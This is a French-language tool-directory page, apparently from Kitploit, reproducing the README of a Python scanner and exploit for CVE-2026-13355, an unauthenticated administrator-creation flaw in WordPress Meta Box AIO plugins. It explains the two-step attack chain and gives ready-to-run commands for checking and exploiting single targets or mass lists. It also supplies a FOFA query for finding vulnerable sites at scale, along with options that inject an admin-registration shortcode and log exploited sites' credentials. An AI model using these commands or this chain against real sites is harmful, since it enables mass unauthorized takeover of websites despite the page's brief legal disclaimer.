Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/murrez/cve-2026-13355
Escalade de PrivilègesReconnaissanceScanners de VulnérabilitésExploitationScripting et AutomatisationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubmurrez/cve-2026-13355

CVE-2026-13355

3il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner et exploit PoC en Python pour CVE-2026-13355, une élévation de privilèges administrateur non authentifiée dans les plugins WordPress Meta Box AIO, avec scan de masse FOFA.

Voir le dépôt

CVE-2026-13355 — Élévation de privilèges administrateur non authentifiée dans Meta Box AIO

Preuve de concept Python 3 — scanner et exploit pour CVE-2026-13355 dans le bundle WordPress Meta Box AIO (et les extensions associées MB Frontend Submission / MB User Profile).

PlateformePlugin WordPress
ComposantMeta Box AIO
AffectéMeta Box AIO ≤ 3.11.0 ; MB Frontend Submission ≤ 4.5.6 ; MB User Profile ≤ 3.11.0
Corrigé dansMeta Box AIO 3.12.0+ (autorisation de Form::process())
CVSS9.8 Critique
AuthNon authentifié
CWECWE-269 — Gestion inappropriée des privilèges
Chercheurh0xilo (Wordfence)

Résumé

Des failles en chaîne dans deux extensions intégrées permettent la création non authentifiée d'un compte administrateur :

  1. MB Frontend Submission (mbfs) — rwmb_frontend_field_object_id remplace la cible du formulaire sans authentification ; Form::process() omet user_can_edit(), ce qui permet aux attaquants d'appeler wp_update_post() et d'écraser post_content sur des articles/pages arbitraires.
  2. MB User Profile (mbup) — Les attributs de shortcode injectés [mb_user_profile_register role="administrator" auto_login="true"] sont acceptés sans validation du rôle.

Important : La chaîne d'exploitation nécessite un formulaire mbfs (soumission frontend) public, et non des formulaires mbup réservés à la connexion. De nombreux résultats FOFA n'exposent que l'interface de connexion/enregistrement mbup — ceux-ci sont signalés comme plugin_mbup_only, non exploitables via cette chaîne.

Prérequis

  • Python 3.8+
  • pip install -r requirements.txt

Démarrage rapide

root@kitploit:~
pip install -r requirements.txt

# Cible unique — vérification (flux terminal en direct par défaut)
python poc.py -u https://target.example --mode check

# Vérification en masse (une ligne par cible sauf --quiet)
python poc.py --list targets.example.txt --mode check --threads 20

# Cible unique — exploitation (nécessite l'URL du formulaire mbfs + l'ID de l'article)
python poc.py -u https://target.example --mode exploit \
  --form-url /contact/ --object-id 12 --verify

# Exploitation en masse depuis la sortie de vérification
python poc.py --list candidates.jsonl --mode exploit --threads 5 --verify

FOFA → liste de cibles

Exemple de requête :

root@kitploit:~
body="/wp-content/plugins/meta-box-aio/"

Normaliser un export CSV FOFA :

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
# écrit list.txt + CSV normalisé (local uniquement, ignoré par git)
python poc.py --list list.txt --mode check --threads 20

Options CLI

Fichiers de sortie

Utilisez --vuln-list exploited.txt lors des exécutions d'exploitation afin que les résultats de vérification dans hits.txt ne soient pas écrasés.

Valeurs de status en vérification

Notes d'exploitation

  • L'étape d'empoisonnement envoie post_content via un formulaire mbfs avec ?rwmb_frontend_field_object_id=<id>.
  • Le succès nécessite que le shortcode injecté soit rendu sur la page empoisonnée (pas de strip/KSES, plugin corrigé, mauvais type de formulaire).
  • Les formulaires mbfs de contact/newsletter manquent souvent d'un véritable champ post_content ; l'écrasement peut échouer en pratique.
  • Un HTTP 403 lors du POST indique généralement un blocage par WAF/hébergeur.

Arborescence du dépôt

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Les listes de scan locales et les artefacts d'exécution (list.txt, fofa*.csv, *.jsonl, hits*.txt, …) sont dans .gitignore et ne doivent pas être commités.

Références

  • NVD — CVE-2026-13355
  • Avis Wordfence
  • Journal des modifications de Meta Box AIO

Légal

Uniquement pour des tests de sécurité autorisés et à des fins éducatives. Vous êtes responsable du respect des lois applicables et des règles du programme.

Télécharger l’outil
OptionDescription
-u, --urlURL de base unique
--listListe d'URL, CSV normalisé FOFA (colonne url), ou candidates.jsonl
--modecheck ou exploit
--form-urlPage contenant [mb_frontend_form ...] / mbfs-form
--object-idID d'article/page pour rwmb_frontend_field_object_id
--pathsChemins supplémentaires à parcourir pour les formulaires frontend
--username, --email, --passwordIdentifiants d'enregistrement (exploit)
--shortcodeCharge utile post_content injectée (shortcode d'enregistrement admin par défaut)
--verifyConfirmer via /wp-admin/ ou wp-login.php après l'enregistrement
--flowDiffuser une ligne par cible lors des exécutions en masse (par défaut avec --list)
--no-flowRésumé de progression uniquement
--quiet, -qSortie console minimale
--threads, -jConcurrence en masse (par défaut 15)
--outputJournal JSONL (par défaut cve_2026_13355_results.jsonl)
--vuln-listLignes de résultats texte / exploitées (par défaut hits.txt / utiliser exploited.txt pour l'exploit)
--candidates-listMétadonnées JSONL de vérification (par défaut candidates.jsonl)
FichierModeContenu
cve_2026_13355_results.jsonlles deuxJSON complet par cible
hits.txtcheckURL avec candidate_mbfs
candidates.jsonlcheckform_url, object_id, indices de version
exploited.txtexploiturl|user|email|pass|oid=…
StatutSignification
candidate_mbfsPlugin présent + formulaire MB Frontend Submission trouvé (exploitation possible)
plugin_mbup_onlyUniquement des formulaires de connexion/enregistrement User Profile — pas cette chaîne CVE
plugin_no_frontend_formsEmpreinte du plugin, aucun formulaire frontend rwmb découvert
patchedVersion au-dessus de la plage affectée (lorsqu'elle est lisible)
no_pluginMeta Box AIO / extensions non détectés